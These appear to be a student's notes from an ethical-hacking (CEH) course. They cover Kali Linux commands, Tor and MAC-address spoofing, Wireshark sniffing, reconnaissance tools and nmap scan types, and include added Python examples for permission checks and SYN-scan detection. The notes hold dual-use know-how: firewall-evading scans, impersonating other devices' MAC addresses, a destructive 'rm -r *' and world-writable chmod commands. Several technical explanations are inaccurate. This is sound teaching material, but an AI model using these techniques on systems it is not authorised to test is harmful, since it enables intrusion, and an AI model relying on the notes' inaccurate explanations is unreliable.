
CEH

NWOGU OBINNA - CEH INSTRUCTOR javatpoint

SOFTWARE REQUIREMENTS
1. ORACLE VIRTUALBOX - Enable Virtualization Technology via the BIOS environment

To enable Virtualization Technology on HP systems:

- Shut down your system
- Power it up and immediately keep tapping the ESC key; it will take you to the BIOS environment
- It will bring up some options; select F10
- Search for Virtualisation Technology or VT-x and enable it

2. KALI LINUX - an operating system (just like Windows) designed for ethical hackers, penetration testers, cyber security professionals etc. All the tools needed for hacking are already pre-installed on Kali Linux.

3. METASPLOITABLE2 - the environment where we'll carry out our lab sessions. It's a machine that is designed to be vulnerable, an environment we can practise our hacking on. It's for learning how to break into servers.

4. BEEBOX/BWAPP (for web applications) - a machine that is designed for cyber security experts. It's for learning how to break into websites, specifically for web application testing.

SYSTEM REQUIREMENTS
1. RAM: at least 8GB of RAM (in the search bar, search for System Information and click on it; you'll find the RAM there).

2. PROCESSOR: you need a processor of at least Core i3 and above or GPU. From the System Information, you can check the kind of processor your laptop has.

3. SPEED: the speed of a system depends on the RAM. It should be at least 2.0GHz or above (you can also check that from your System Information).

4. HDD (hard disk): you should have free space of at least 250GB.

5. Your system should support Virtualisation Technology.

AN ALTERNATIVE IS:
- DUAL BOOTING
- LIVE BOOT FROM USB - (for this, you need tools like
RUFUS to make the USB drive bootable)

Monday 24/7/23

INTRODUCTION TO KALI

- File structure

- Directories & Sub directories in Kali

- The Terminal

Common commands to use in Kali

- sudo: used to run a program with the privileges of the admin. It is similar to 'Run as administrator' in Windows (the admin is not restricted or limited in anything on the system).

- apt: to download

updating your repository (to install in Kali - apt install)

Note: you must first update your repository before you can do anything on Kali. Without that, if you want to install anything it won't go. We also need permission from the admin to update the repository. The command is (sudo apt update).

Logging in to the terminal as administrator (root): sudo -i (then input your password). Note: the root user is the administrator on Kali. Once you are root, you don't need sudo to get permission. You can use the exit command to leave the root directory.

root (#); standard user ($)

- adduser: use the adduser command to create your own user. The command is: sudo adduser [name of user]. It will then ask you to create a password. Note: the new user you created will not be in the sudoers list.

- usermod: used to add a user to the sudoers list (sudo usermod -aG sudo [name of user]).

- pwd: shows the current directory or folder that you are in. pwd means print working directory. /home/[username] is the default directory when you start up your terminal.

- cd: used to change directory.

cd .. : this will take you one step down to the former directory

cd -- : this will take you back to the default directory

Note that the cd command is case sensitive.

- ls: lists the content of a directory. We can also use the ls command to see hidden files and folders.

ls -a: shows hidden files

To create a hidden file manually:

right click, click on create folder, then add (.) before the file name. It will automatically hide the folder (to hide a file in Linux, you add a . at the beginning of the file name).

ls -l: shows more information about the files and folders in a particular directory.

ls -al: a combined command. It shows the hidden files and more information about the files.

- mkdir: a command used to create a directory

mkdir (folder1) (folder2) (folder3): this will create multiple folders at the same time

mkdir (.foldername): this command will create a hidden folder. The (.) before the name is what makes the folder hidden.

- touch: used to create a regular file, e.g. .txt, .py, .lst, .rb

touch filename.txt - this will create a single file

touch greetings.py todo.lst items.txt account.rb - this will create multiple files with different file types

- nano: nano is a CLI text editor. It can only be used in the terminal. It can be used to read a file and write into a file.

nano greetings.py - this command will open the file greetings.py so that we can write into it, edit it or read it.

#!/usr/bin/python3 - shebang (scripting language)

print("Welcome to CEH Training with HiiT")

./[greetings.py] - this is the command to run the script/code in the terminal. Note: this command will give you permission denied, and if you try sudo it will give you command not found, if the user has not been given permission to execute.

- cat: used to read the content of a file. It works for any regular file.

cat [filename.extension]

- chmod: used to give permission. Permission can be given to owner, group and others. These are the 3 entities you can give permission to. The permissions that can be given to them are read, write and execute.

Permission in Kali:

(-rw-r--r--) --> -[rw-] [r--] [r--] : the first part is for the owner, so the owner is given read and write permission; the second part is the group, and the group is given only read permission; the third part is others, and others are given only read permission.

To give permission to the owner: sudo chmod u+x [filename]

[ sudo chmod u+x greetings.py ] - this command will grant the user permission to execute the specified file (greetings.py).

[ sudo chmod u-x greetings.py ] - this will take away the execute permission given to the owner

[ sudo chmod u=rwx greetings.py ] - this will give read, write and execute permission to the user at the same time

[ sudo chmod g=rwx greetings.py ] - this will give the group permission
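The permission string and chmod clauses above, worked through as an added example (not part of the original notes): it decodes -rw-r--r-- into its numeric mode, applies each clause to a scratch copy of greetings.py, and marks the point where the file becomes writable by every user. The helper names and the scratch file are assumptions made for the illustration.

```python
import os
import stat
import tempfile

WHO = {"u": 0o700, "g": 0o070, "o": 0o007, "a": 0o777}   # owner, group, others, all
WHAT = {"r": 0o444, "w": 0o222, "x": 0o111}              # read, write, execute


def mode_string_to_octal(listing):
    """Turn an `ls -l` string such as '-rw-r--r--' into its numeric mode."""
    perms = listing[-9:]          # skip the leading file-type character
    mode = 0
    for position, char in enumerate(perms):
        if char != "-":
            mode |= 1 << (8 - position)
    return mode


def apply_symbolic(mode, clause):
    """Apply one chmod clause (u+x, u-x, u=rwx, g=rwx, a=rwx) to a mode."""
    op = next((c for c in clause if c in "+-="), None)
    if op is None:
        raise ValueError("no +, - or = in %r" % clause)
    who, perms = clause.split(op, 1)
    who_mask = 0
    for entity in who or "a":
        who_mask |= WHO[entity]
    selected = 0
    for perm in perms:
        selected |= WHAT[perm] & who_mask
    if op == "+":
        return mode | selected
    if op == "-":
        return mode & ~selected
    return (mode & ~who_mask) | selected      # '=' replaces that entity's bits


def is_world_writable(mode):
    """True when 'others' hold write permission."""
    return bool(mode & stat.S_IWOTH)


def walk_through():
    """Run the chmod clauses from the notes against a scratch greetings.py."""
    steps = []
    with tempfile.TemporaryDirectory() as workdir:
        path = os.path.join(workdir, "greetings.py")
        with open(path, "w") as handle:
            handle.write('#!/usr/bin/python3\nprint("Welcome")\n')
        os.chmod(path, mode_string_to_octal("-rw-r--r--"))
        for clause in ("u+x", "u-x", "u=rwx", "g=rwx", "a=rwx"):
            current = stat.S_IMODE(os.stat(path).st_mode)
            os.chmod(path, apply_symbolic(current, clause))
            new_mode = os.stat(path).st_mode
            steps.append((clause, stat.filemode(new_mode),
                          is_world_writable(new_mode)))
    return steps


if __name__ == "__main__":
    for clause, listing, risky in walk_through():
        note = "  (writable by every local user)" if risky else ""
        print("chmod %-6s -> %s%s" % (clause, listing, note))
```

Only the last clause, a=rwx, sets the write bit for others, which is why it is the one to avoid on files that other accounts can reach.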

/home/[user]/[filepath]/[filename] - to access any file from another user

To add a user to a group:

- create a new user and add it to the sudoers list

- sudo groupadd [groupname] - this will create a new group ceh. Note that this group must be created on the owner's profile

- sudo usermod -aG [groupname] [newuser]

- sudo chgrp [groupname] greetings.py - this will change the group ownership of greetings.py to ceh

- chown: used to change the ownership of a file

sudo chown [newowner]:[group] filename

- cp: used to copy a file from one directory to another. It duplicates the file, i.e. the original file stays where it is and a copy is placed in the other directory.

cp [filename] [/absolute path to copy to] - this will copy the file

cp [filename] [/absolute path/new.file.name] - this will copy the file to the desktop and rename it with the new file name

cp [file1 file2 file3] [/absolutepath] - this command is used to copy more than one file at the same time

sudo cp [filename] [/absolute path to other user] - this is used to copy a file from one user to another

Note: the file might be locked, i.e. it will report that the file belongs to root. The command to remove the restriction on the file is:

sudo chmod a=rwx [/file path] ------ a stands for all

cp -r [foldername] [/folderpath] - this command is used to copy a folder to another path

cp -r [foldername] [/pathtocopyto/newfoldername] - this is used to copy a folder and rename it

cp -r [folder1 folder2 folder3] [/folderpath] - this is used to copy multiple folders at the same time

cp -r * [/path to copied to] - this command is used to copy everything (both files and folders) in the cd'ed folder to another path

- rm: used to remove a file or directory

rm [filename] - this removes the file from the directory

rm [file1] [file2] [file3] - this command is used to remove multiple files at the same time

rm -r [foldername] - this command is used to remove folders

rm -r [folder1 folder2 folder3] - this command is used to remove multiple folders at the same time

rm -r * - this will remove all files and folders in the directory

- mv: used to move a file in Kali. It is similar to the cut command in Windows.

mv [filename] [/path to move to] - this will move the file to the new path

mv [file1 file2 file3] [/path to move to] - this is to move multiple files at the same time

mv [filename] [/pathtomoveto/newfilename] - this will move the file and rename it

mv [foldername] [/pathtomoveto] - this command is used to move a folder

mv [folder1 folder2 folder3] [/pathtomoveto] - this will move multiple folders at the same time

mv * [/pathtomoveto] - this will move all the files in the directory to the new path

- ifconfig - used to show network details on Kali

eth0 - interface

mtu .. - data packet size

inet .. - IP address of the network

netmask -

broadcast - name address

inet6

ether: MAC address; it's the address of the device

lo: is reserved for device

- netstat - used to show established connections. It shows both local and remote connections.

netstat -ano

local address: this is your current IP address

foreign address: this is the port address you're connected to

- top: used to see the processes that are running, and you can use it to end a process. It is similar to Task Manager in Windows. It is a CLI tool and only runs in the terminal.

PID: process identifier

user: this is the user running the process

to end a process: press k and it will ask you to input the PID number

- sudo bash: to log in as root

- w: used to show the users that are logged in

whoami: will tell you the current user that is logged in

id: will give you more information about the user

- man: this command means manual. It is used to give information about a command.

man [command]

equally, you can use help:

[command] --help

Wednesday, 8th July, 2023

ANONYMITY IN KALI

Anonymity is like a shield.

to achieve anonymity, we use proxy server

Difference between proxy and VPN:

A proxy is like an IP protocol which is not owned by anyone. It can only be connected for a few hours and then reconnects again, which makes it hard to trace. One can only trace you on a proxy by hacking you, while a VPN is a connection to a private network owned by an individual.

HOW TO MASK OUR IP ADDRESS IN KALI

Tor uses Onion Routing to make connections (it connects to multiple routers before connecting to the main server). Nobody owns Tor; it just uses IP protocol.

to achieve that, we install Tor:

Step1: start up your terminal

Step2: update your repository

Step3: use the command (sudo apt install tor) to install Tor

Step4: start up Tor using the command (tor)

now install the proxy extension

Step1: open up Firefox

Step2: go to the add-ons and themes manager (you'll find it at the top right corner), then Extensions

Step3: search for foxyproxy in the extensions and click on FoxyProxy Standard

Step4: click on it and click on Add to Firefox

Step5: open dnsleaktest.com in your browser to check your IP address

Step6: go to the proxy tab and click on it, click Options, then Add

Step7: give the proxy a name (tor proxy), then choose SOCKS5 under proxy type

Step8: go to your terminal and copy the IP address and port

Step9: input them, then click on Save

Step10: go to your proxy list and click on the new one you added

Step11: then go back to dnsleaktest.com and check your IP address

Note: Tor must be running, and turn off your FoxyProxy to be able to browse on Firefox

HOW TO MASK OUR MAC ADDRESS ON KALI

We'll be using macchanger for the MAC address. Press Ctrl + C to stop Tor in the terminal.

First check your MAC address by typing the command ifconfig in your terminal.

macchanger --help - to get more information about macchanger

To change your MAC address randomly:

Step1: disconnect your internet

Step2: type in the command (sudo macchanger -r eth0) to change your MAC address randomly. Note: eth0 is the interface

Step3: type ifconfig to confirm that your MAC address has changed

To use another user's MAC address, we'll be using an online platform (MAC address generator):

Step1: go to your browser and search for mac address generator

Step2: click on the first option

Step3: change the case to lower case, then click on generate

Step4: copy the MAC address, then disconnect your internet

Step5: now go to your terminal and type in the command

sudo macchanger -m [copied mac address] [interface]

To change the MAC address back to your original MAC address, type in the command:

sudo macchanger -p [interface]

duckduckgo.com - a search engine to browse anonymously

SNIFFING

- TCP flags: TCP (Transmission Control Protocol) flags are used to tell/indicate the state of a connection.

flags are things that happen behind the scenes

1. (SYN)/synchronization: used to initiate a connection. The SYN flag must be set before a communication can start.

2. (ACK)/acknowledgment: used to acknowledge whatever request has been sent. This is like a receipt that tells you the state of whatever you have sent on that record.

3. (FIN)/finish: when two computers are done exchanging data on the internet, the FIN flag must be set to end that conversation.

4. (RST)/reset: used to reset a connection.

5. (PSH)/push: if a system receives a push flag, it pauses all other processes and attends to the push.

6. (URG)/urgent: if a system receives a packet with an urgent flag, it has to complete whatever it is doing before it attends to the urgent packet.

- 3-way handshake: a connection establishment process. If the 3-way handshake is not complete, the site or connection will never be established. The 3-way handshake is SYN, SYN-ACK, ACK.

- Sniffing: in ethical hacking, sniffing is defensive. Sniffing is the process of monitoring and capturing all data packets passing through a given network. Sniffing is all about monitoring networks. Sniffing is used by cyber criminals to steal personal information. Cyber security professionals sniff their network in an effort to make it more secure. We have 2 types of sniffing: passive and active.

passive sniffing: this is somewhat outdated or obsolete. It makes use of a hub. You can only monitor the network; you cannot alter the traffic.

active sniffing: this is relative. You can both monitor and alter with active sniffing.

- wireshark: a tool you can use to carry out sniffing. Wireshark has a friendly interface (the GUI is easy to understand and well detailed compared to other sniffers). It is open source. It can be used to monitor a network, capture packets and analyze them. Wireshark does not raise an alarm or tell you that you are under attack. It captures packets in real time.

practically:

how to start up Wireshark:

Wireshark can be started in two ways: from the terminal, or by searching for it in your application menu.

to start up Wireshark through the terminal, open a terminal and type in the command (sudo wireshark)

to start sniffing:

go to the terminal and check your interface with the command ifconfig

then go to Wireshark and click on the interface you want to sniff on

TASK

visit a site (zero.webappsecurity.com) and go to Wireshark to capture the 3-way handshake

to narrow the Wireshark packets down to a specific IP address,

open a terminal and ping the address (ping -c 4 zero.webappsecurity.com)

use the filter (ip.addr==54.82.22.214): copy the address and paste it into the Wireshark filter bar (if it shows green, then it's correct; if it is red, it's not correct), or use (http.request.method=="POST")

Wednesday 9/8/23

Information Gathering: the art of gathering information to prepare an attack.

Reconnaissance in other words means information. This is the first phase of hacking. This is where the attacker tries to know more about the network than the people who are running it.

There are 2 types of reconnaissance: passive and active

Passive reconnaissance: this is when you gather information through a third party. It is where you gather information without attacking the target directly.

Active reconnaissance: this is when you're attacking the target directly to get information. It attacks the server to get information. Cybersecurity experts can see when you're trying to attack them actively. It is good to use a proxy when carrying out active reconnaissance.

Footprinting: this means the tool will gather information passively. It is based on third-party knowledge.

Fingerprinting: this means the tool will carry out the attack actively.

Webserver: this contains the code you used to build a website. If an attacker wants to hack you, the attacker will have to gather information on the webserver to understand it better.

DNS server: DNS is the phone book of the internet. It is your domain name provider that has the DNS server. The webserver depends on the DNS server.

Mailserver: used to deliver and receive emails. It can also be referred to as an e-mail server. It delivers emails to client computers.

Subdomain: this is similar to sub-netting. Attackers also look out for subdomains. It is breaking down our domain into many domains. Subdomains are created to help organize and navigate to different sections of your main website.

How to gather information on Subdomains, DNS, Mail and Server

Tool to use

dnsenum: this tool gathers all the information (webserver, subdomain, mailserver, DNS server) at once.

Steps:

- Start up your terminal

- type in the command (dnsenum [domainname])

under the host's addresses, you'll get two IP addresses for the web server, which means that either of them is a secondary server or a load balancer, i.e. anytime you connect to the website, it can connect to either of the IP addresses. When an attacker attacks one of the IP addresses, there is still another IP address left.

the first number there (5) means TTL (time to live) - it means how many time does the packet have to be discarded

the IN is for the main server

the A (A record) is used to tell what type of IP address it uses. An A record maps a domain name to an IP address version 4. It can also be an AAAA record, which means IP address version 6.

name servers: this shows the number of DNS servers the domain name uses

Mail (MX) servers: this is for the main server; it shows the mail server the domain name is connected to.

Brute forcing: this is where the subdomains are. They are similar to the main IP address. (CNAME means Canonical name)

Class: this is where you get the class of the IP address. Most networks are already subnetted.

the class of an IP address is based on the number in the first part

Class A: 1-126, Class B: 128-191, Class C: 192-223
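The record fields explained above (name, TTL, IN, record type, address), read back by a small parser as an added example that is not part of the original notes. The sample lines, the example.test names and addresses, and the function names are constructed for the illustration; the five-column layout is an assumption based on the description above.

```python
from collections import defaultdict

# Constructed sample in the "name  TTL  class  type  value" layout.
SAMPLE = """\
Host's addresses:
example.test.          5      IN    A        10.20.30.40
example.test.          5      IN    A        10.20.30.41
Name Servers:
ns1.example.test.      300    IN    A        172.16.5.1
ns2.example.test.      300    IN    A        172.16.5.2
Mail (MX) Servers:
mail.example.test.     300    IN    A        192.168.7.25
Brute forcing:
www.example.test.      300    IN    CNAME    example.test.
shop.example.test.     300    IN    AAAA     2001:db8::10
"""


def parse_records(text):
    """Return one dict per record line; headings and blank lines are skipped."""
    records = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 5 or not fields[1].isdigit():
            continue
        name, ttl, rclass, rtype, value = fields
        records.append({"name": name.rstrip("."), "ttl": int(ttl),
                        "class": rclass, "type": rtype,
                        "value": value.rstrip(".")})
    return records


def ip_class(address):
    """Class of an IPv4 address from its first part, per the table in the notes."""
    first = int(address.split(".")[0])
    if 1 <= first <= 126:
        return "A"
    if 128 <= first <= 191:
        return "B"
    if 192 <= first <= 223:
        return "C"
    return "other"


def summarise(records):
    """Group A records per host, follow CNAMEs, and label each IPv4 address."""
    addresses = defaultdict(list)
    aliases = {}
    for rec in records:
        if rec["type"] == "A":
            addresses[rec["name"]].append(rec["value"])
        elif rec["type"] == "CNAME":
            aliases[rec["name"]] = rec["value"]
    # A CNAME points at another name; resolve it to that name's A records.
    resolved = {alias: addresses.get(target, [])
                for alias, target in aliases.items()}
    return {
        "multi_address_hosts": {n: a for n, a in addresses.items() if len(a) > 1},
        "alias_addresses": resolved,
        "classes": {a: ip_class(a) for lst in addresses.values() for a in lst},
        "ipv6_hosts": [r["name"] for r in records if r["type"] == "AAAA"],
    }


if __name__ == "__main__":
    for key, value in summarise(parse_records(SAMPLE)).items():
        print(key, "=", value)
```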

Whatweb: this gathers information from the website. It crawls the network to get information from the website or the webserver.

whatweb [domainname]

after it loads, we are only interested in where we got [200 OK], which means that all is fine/successful. If you look carefully and the site is showing the version of the language used to create the website, that is not good for them because hackers can exploit that particular version. Finally, it will show you the package the website is built on, like WordPress.

Email reconnaissance: this gives you the email addresses of the staff in that organization. We will be using the tool theHarvester to gather that information.

- go to the terminal and type in the command

theHarvester -d [domainname] -l [no.of.limit] -b [source]

-d is the domain name of the target

-l is the limit on the number of results. The default is 500

-b is the source the information will be gathered from

OSINT is used to carry out passive reconnaissance


Friday

How to configure API keys for theHarvester

/etc/theharvester/api-keys.yaml - confirm this from your file system

after that, cd to the above path and open the file with sudo [sudo nano api-keys.yaml]

how to get an API key

we'll be trying Shodan first

- visit shodan.io and create an account

- after verifying your account, go to your account settings; you'll see your API key

- copy it and paste it under the shodan key, then save.

- wafw00f: a tool used to gather information about a firewall. It will tell you if the target has a firewall or not. The command is:

sudo wafw00f [domain.name]

Types of Firewall

- the stateless firewall for windows applications. it blocks packets

- stateful

- web application firewall

- hybrid firewall

CLASSWORK

Carry out reconnaissance with the whatweb and wafw00f tools using a proxy

wafw00f --proxy=socks5://127.0.0.1:9050 [domain.name] - for SOCKS5

wafw00f --proxy=http://127.0.0.1:8080 [domain.name] - for HTTP proxy

whatweb --proxy=127.0.0.1:8080 [domain.name]

Note: whatweb only recognizes HTTP proxies, so you have to use Burp Suite, but wafw00f recognizes both HTTP and SOCKS5 proxies

We have a SOCKS proxy (Tor proxy) and an HTTP proxy

for the HTTP proxy, search for burpsuite (burpsuite is used to change HTTP proxy) and open it. Click on temporary project, then next. Then go to proxy and click on intercept, check that it's off, then go to options and you'll see the proxy IP address and port number. Copy them and use them in your terminal.

Monday 14th August, 2023

reconftw is the best tool you can use for reconnaissance. It does everything the wafw00f and whatweb tools do. reconftw doesn't come with Kali, so we have to download it from GitHub. The steps to get the tool on Kali are as follows:

(each time you want to download a tool from GitHub, you have to scroll down and look for the installation setup and guide. That will give you the guide to download and set up the tool)

- start up your browser and search for reconftw github

- look for the one from six2dez and click on it

- check the instructions; you might have to install golang first

to install golang

- go to golang.org and install golang for Kali

- download golang for Kali

- after it has downloaded, go to your terminal and cd into your Downloads

- then log in as root using sudo bash - this will log you in as root in the Downloads folder

- then go to your installation guide, copy the code there and follow the process

now go back to your GitHub installation guide and follow the steps under it

- after the first step, go to the second step, copy the code under it, then run it line by line

after installation, to run the tool reconftw, cd into the recon folder and type in the command ./reconftw.sh -d [domainname.com] -r

WEDNESDAY 16/08/23

Port Scanning and Enumeration

you'll learn how to perform port scanning using one of the most advanced tools, nmap

Port Address/Number is the service that your IP address uses to communicate. It is like your residential address, i.e. you tell someone that HiiT is at Obafemi Awolowo. Once an attacker scans a port, they can get the kind of service the port is running. There are 65535 ports on a network. It can't go beyond that, and all of these ports operate in the transport layer of the OSI model.

192.168.0.21:80 - when you scan a port and you see port 80, that means the service is running on the web

Types of Ports

- well known ports: the port numbers ranging from 0 to 1023; examples are

Port Number    Description            TCP/UDP

0              Reserved               TCP/UDP
21             FTP                    TCP
22             SSH (Secured Shell)    TCP/UDP
23             telnet                 TCP/UDP
25             SMTP
53             DNS
80             HTTP

FTP (file transfer protocol) is for files; if you break into an FTP port you can steal files

SSH (secured shell) is for encryption. It is used for remote access, and the remote access is secured. An attacker cannot read and understand whatever it is even if they manage to steal the file

telnet - you can do whatever you do on port 22 on port 23 also, just that it is not secured

SMTP (simple mail transfer protocol) - this means it can send and receive emails

DNS (domain name system) - this connects

Registered Ports - similar to a domain name, because it has been bought by a specific organization and only they can access the port. Any ports ranging from 1024 - 49151 are known as registered ports for vendors.

Ephemeral/Dynamic Ports - these are ports that your system needs. These ports range from 49151 - 65535

Port Scanning and Enumeration - port scanning helps you audit your networks. It is also used for vulnerability assessment. Attackers will want to carry out port scanning in order to attack your system. While port scanning looks for open ports, enumeration is used for usernames, machine names, shared resources etc. You can't carry out enumeration if you don't have access to the system.

Port Scanning with Nmap - Nmap is one of the best open-source tools you can use for port scanning. Nmap is flexible: aside from port scanning it can carry out other functions. It is powerful and easy to use.

Types of Scan with Nmap

Syn stealth scan: this carries out scans without raising flags. It is stealthy; it can not be noticed. The concept behind this scan is that it will send a SYN flag to the target and the target will respond with SYN-ACK, but instead of nmap sending an ACK flag, it will send a reset to bypass the server. The SYN stealth scan does not complete the 3-way handshake.

how to initiate an nmap SYN stealth scan:

- start up your terminal

- type in the command sudo nmap -sS [domain.name] ; -sS is for SYN stealth scan

by default, the SYN stealth scan will only scan the well known ports, so to get nmap to scan a range of ports, you'll use the command sudo nmap -p 21-65535 -sS [domainname] ; -p is for port range

Fragmented Scan - you carry out this scan when you don't get results from the SYN stealth scan. Fragmented scan bypasses the firewall: it splits the packet into hidden bits and it will get into the firewall. The firewall doesn't have the capability to defragment packets. You'll use the command sudo nmap -f [domain.name] for a fragmented scan.

Note that both the SYN stealth scan and the fragmented scan will get you the same result, just that they use different approaches.
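The SYN, SYN-ACK, RST sequence of the SYN stealth scan, seen from the monitoring side and compared with the full 3-way handshake from the sniffing section: an added example (not part of the original notes) that decodes the TCP flag byte and labels each flow in a capture. The packets are constructed in the code from documentation addresses, and the function names and the threshold of two half-open flows are assumptions.

```python
import socket
import struct
from collections import Counter

FLAGS = (("FIN", 0x01), ("SYN", 0x02), ("RST", 0x04),
         ("PSH", 0x08), ("ACK", 0x10), ("URG", 0x20))


def build_packet(src, sport, dst, dport, flag_names):
    """Constructed sample data: minimal IPv4+TCP headers, checksums left zero."""
    bits = sum(bit for name, bit in FLAGS if name in flag_names)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, bits, 64240, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    return ip + tcp


def parse_packet(raw):
    """Return (src, sport, dst, dport, flags) for an IPv4 TCP packet, else None."""
    if len(raw) < 20 or raw[0] >> 4 != 4 or raw[9] != 6:
        return None
    ihl = (raw[0] & 0x0F) * 4
    if len(raw) < ihl + 14:
        return None
    sport, dport = struct.unpack("!HH", raw[ihl:ihl + 4])
    flag_byte = raw[ihl + 13]                      # TCP flags live at offset 13
    flags = {name for name, bit in FLAGS if flag_byte & bit}
    return (socket.inet_ntoa(raw[12:16]), sport,
            socket.inet_ntoa(raw[16:20]), dport, flags)


def classify(packets):
    """Map each (client, cport, server, sport) flow to its handshake outcome."""
    state = {}
    for raw in packets:
        parsed = parse_packet(raw)
        if parsed is None:
            continue
        src, sport, dst, dport, flags = parsed
        fwd, rev = (src, sport, dst, dport), (dst, dport, src, sport)
        if flags == {"SYN"}:
            state[fwd] = "SYN_SENT"
        elif flags == {"SYN", "ACK"} and state.get(rev) == "SYN_SENT":
            state[rev] = "SYN_ACK"
        elif "RST" in flags and state.get(rev) == "SYN_SENT":
            state[rev] = "REFUSED"                 # port closed on the server
        elif flags == {"ACK"} and state.get(fwd) == "SYN_ACK":
            state[fwd] = "ESTABLISHED"             # SYN, SYN-ACK, ACK
        elif "RST" in flags and state.get(fwd) == "SYN_ACK":
            state[fwd] = "HALF_OPEN"               # SYN, SYN-ACK, RST
    return state


def half_open_sources(state, threshold=2):
    """Source addresses with at least `threshold` half-open flows."""
    counts = Counter(key[0] for key, s in state.items() if s == "HALF_OPEN")
    return sorted(ip for ip, n in counts.items() if n >= threshold)


def sample_capture():
    """One ordinary browser connection plus three probes from another host."""
    user, probe, server = "192.0.2.10", "203.0.113.7", "198.51.100.5"
    pk = build_packet
    return [
        pk(user, 50000, server, 80, {"SYN"}), pk(server, 80, user, 50000, {"SYN", "ACK"}),
        pk(user, 50000, server, 80, {"ACK"}), pk(user, 50000, server, 80, {"PSH", "ACK"}),
        pk(probe, 40001, server, 22, {"SYN"}), pk(server, 22, probe, 40001, {"SYN", "ACK"}),
        pk(probe, 40001, server, 22, {"RST"}),
        pk(probe, 40002, server, 80, {"SYN"}), pk(server, 80, probe, 40002, {"SYN", "ACK"}),
        pk(probe, 40002, server, 80, {"RST"}),
        pk(probe, 40003, server, 23, {"SYN"}), pk(server, 23, probe, 40003, {"RST", "ACK"}),
    ]


if __name__ == "__main__":
    flows = classify(sample_capture())
    for flow, outcome in flows.items():
        print("%s:%d -> %s:%d  %s" % (flow + (outcome,)))
    print("sources with repeated half-open flows:", half_open_sources(flows))
```

A single reset after SYN-ACK can be an aborted connection; it is the same source repeating the pattern across ports that stands out in a capture.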

Ping scan - ping scan is similar to the ping you normally use. It sends an ICMP ECHO REQUEST and if the port is . it will show you the IP address and MAC address of a network. Ping scan is used for auditing networks. We'll be carrying out ping scans locally and remotely. If we want to know how many people are connected to our wifi, we can use a ping scan to know how many people are connected - locally. To do it remotely, it'll scan the number of connected devices on the network and can instruct all the devices to attack the system

to do it remotely

- first switch your network to bridged on VMware

bridged shares the same network as your Windows host, while NAT uses another network. NAT (Network Address Translator) is used to translate a private IP to a public IP

- check your IP address on Kali with ifconfig

- to initiate the ping scan, type in the command sudo nmap -sP [your.kali.IP.address]. Note that you'll change the last octet to 1-255, as in 192.168.136.[1-255]

to scan for ipaddress of port in a target host, use the command sudo nmap -sP [ipaddress.1-255]

Version Detection Scan - this nmap scan is not only going to tell us the port number, it's going to give us the version number and product name of the web servers too. To do this, we'll use the command sudo nmap -sV [domainname]

OS Fingerprinting Scan - this type of scan will get you the operating system the target is using.

to carry out the scan, use -O as in nmap -O [target]

How to use ping to determine what operating system it's using

when you carry out the scan, you'll determine the type of OS the server is running by the TTL

nmap scripting engine

nmap understands the Lua programming language. The path where scripts for nmap are saved is /usr/share/nmap/scripts/

ASSIGNMENT

nmap -sC [domain.name] - this will carry out a scan on all the scripting lang

using nmap:

- perform an idle scan - sudo nmap -Pn -sI testphp.vulnweb.com hiitplc.

- perform zombie scan -

- perform a spoof IP source scan

- perform a vuln scan

- perform an XMAS scan


how to shut down open ports

- scan your IP address

if no port is open, you have to open a port: sudo service [porttype] start

to open a port, you use the command sudo service apache2 start; this will open port 80. For port 21, you have to install vsftpd first. To install it you use the command sudo apt install vsftpd, then to open it, you use the command sudo service vsftpd start

to stop a port you'll use the command sudo service [porttype] stop

to close port 21, you use the command sudo service vsftpd stop, and likewise for port 80, sudo service apache2 stop
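Before stopping services it helps to list what is actually listening. This added example (not part of the original notes) reads netstat -ano style output, labels each listening port with the port ranges and service names given earlier, and attaches the stop command from the notes where one exists. The sample output is constructed, and the column layout, function names and the choice to mark FTP and telnet as unencrypted are assumptions.

```python
# Constructed sample of `netstat -ano` output on a Linux host.
SAMPLE = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 192.168.136.128:51514   54.82.22.214:80         ESTABLISHED keepalive (7.1/0/0)
tcp6       0      0 :::80                   :::*                    LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN      off (0.00/0/0)
"""

# Service names from the well-known ports table in the notes.
SERVICES = {0: "Reserved", 21: "FTP", 22: "SSH", 23: "telnet",
            25: "SMTP", 53: "DNS", 80: "HTTP"}
UNENCRYPTED = {21, 23}                     # assumption: flag FTP and telnet
# Stop commands exactly as given in the notes; other services have none listed.
STOP_COMMANDS = {21: "sudo service vsftpd stop", 80: "sudo service apache2 stop"}
ALL_INTERFACES = {"0.0.0.0", "::"}


def port_range(port):
    """Range name using the boundaries from the notes (49151 counted as registered)."""
    if 0 <= port <= 1023:
        return "well known"
    if port <= 49151:
        return "registered"
    return "ephemeral/dynamic"


def listening_sockets(text):
    """Yield (address, port) for every TCP socket in LISTEN state."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6 or not fields[0].startswith("tcp"):
            continue
        if fields[5] != "LISTEN":
            continue
        address, _, port = fields[3].rpartition(":")   # handles ':::80' too
        yield address, int(port)


def audit(text):
    """Return one finding per listening port, sorted by port number."""
    findings = []
    for address, port in listening_sockets(text):
        findings.append({
            "port": port,
            "service": SERVICES.get(port, "unknown"),
            "range": port_range(port),
            "reachable_from_network": address in ALL_INTERFACES,
            "unencrypted": port in UNENCRYPTED,
            "stop_command": STOP_COMMANDS.get(port),
        })
    return sorted(findings, key=lambda f: f["port"])


def review_first(findings):
    """Ports that are both network-reachable and unencrypted."""
    return [f["port"] for f in findings
            if f["reachable_from_network"] and f["unencrypted"]]


if __name__ == "__main__":
    results = audit(SAMPLE)
    for f in results:
        print("%5d  %-8s %-18s reachable=%-5s stop: %s" % (
            f["port"], f["service"], f["range"],
            f["reachable_from_network"], f["stop_command"] or "-"))
    print("review first:", review_first(results))
```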

Mitigation

- using firewall to redirect open ports to empty host

Vulnerability Assessment

Need for vulnerability assessment

- you can close unnecessary ports with vulnerability assessment

- it helps you check for unknown devices connected to the network or system

- third-party applications that are vulnerable to known exploits

- unnecessary services running on the device

